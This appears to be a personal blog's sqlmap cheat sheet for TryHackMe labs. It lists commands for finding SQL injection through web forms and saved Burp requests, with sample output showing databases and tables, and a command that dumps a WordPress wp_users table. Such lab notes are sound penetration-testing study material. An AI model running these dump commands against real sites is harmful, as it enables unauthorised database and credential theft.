Skip to main content

sqlmap: Notes

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

apt install sqlmap

sqlmap -u http://10.10.239.79 --forms --dump

Use sqlmap with Burp Suite

sqlmap -r filename-saved-from-burpsuite

sqlmap -r sqlinjection2 --tamper=space2comment --dbms=sqlite --dump --level 5

Example: Dump SQlite

# sqlmap -r sqli-day5 --level 2 --batch --dbms=SQlite --dump

List all databases

# sqlmap -u http://10.10.200.148/users/login.php -forms -batch --dbms=mysql --dbs
...
[19:05:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
[19:05:23] [INFO] fetching database names
[19:05:24] [INFO] retrieved: 'information_schema'
[19:05:24] [INFO] retrieved: 'wackopicko'
available databases [2]:
[*] information_schema
[*] wackopicko
...

List tables in a database

sqlmap -u http://10.10.200.148/users/login.php -forms -batch --dbms=mysql -D wackopicko --tables
...
[19:09:12] [INFO] testing MySQL
[19:09:12] [INFO] confirming MySQL
[19:09:13] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.0.0
[19:09:13] [INFO] fetching tables for database: 'wackopicko'
[19:09:13] [INFO] retrieved: 'admin'
[19:09:14] [INFO] retrieved: 'admin_session'
[19:09:14] [INFO] retrieved: 'cart'
[19:09:14] [INFO] retrieved: 'cart_coupons'
[19:09:14] [INFO] retrieved: 'cart_items'
[19:09:15] [INFO] retrieved: 'comments'
[19:09:15] [INFO] retrieved: 'comments_preview'
[19:09:15] [INFO] retrieved: 'conflict_pictures'
[19:09:15] [INFO] retrieved: 'coupons'
[19:09:15] [INFO] retrieved: 'guestbook'
[19:09:16] [INFO] retrieved: 'own'
[19:09:16] [INFO] retrieved: 'pictures'
[19:09:16] [INFO] retrieved: 'users'
Database: wackopicko
...

Exampe dumb data from wp_users table of wordpress database

sqlmap -u http://wekor.thm/it-next/it_cart.php --forms --dbms=mysql -D wordpress -T wp_users --dump --batch

Reference

>>> sqlmap cheat sheet

>>> THM | 25 Days of Cyber Security - Day 5

Practice

>>> https://tryhackme.com/room/ccpentesting

>>> The Cod Caper | Task 4 - Web Exploitation

>>> THM Advant of Cyber 2 | Task 10 - Day 5

>>> THM | SQL Injection Lab

>>> THM | 25 Days of Cyber Security - Day 5

>>> THM | Wekor

>>> THM | WebAppSec 101

Labels:

Popular posts from this blog

Microsoft Windows Server 2012 R2 Standard Evaluation Product Key

Microsoft Windows Server 2012 R2 Standard Evaluation D2N9P-3P6X9-2R39C-7RTCD-MDVJX DBGBW-NPF86-BJVTX-K3WKJ-MTB6V
Read more

ManageEngine ServiceDesk Plus - Reset password

Let's reset the default administrator's password to 'admin'
Read more

hmailserver: Notes from the field

hmailserver is one of free open source mail servers running on Microsoft Windows operating system.
Read more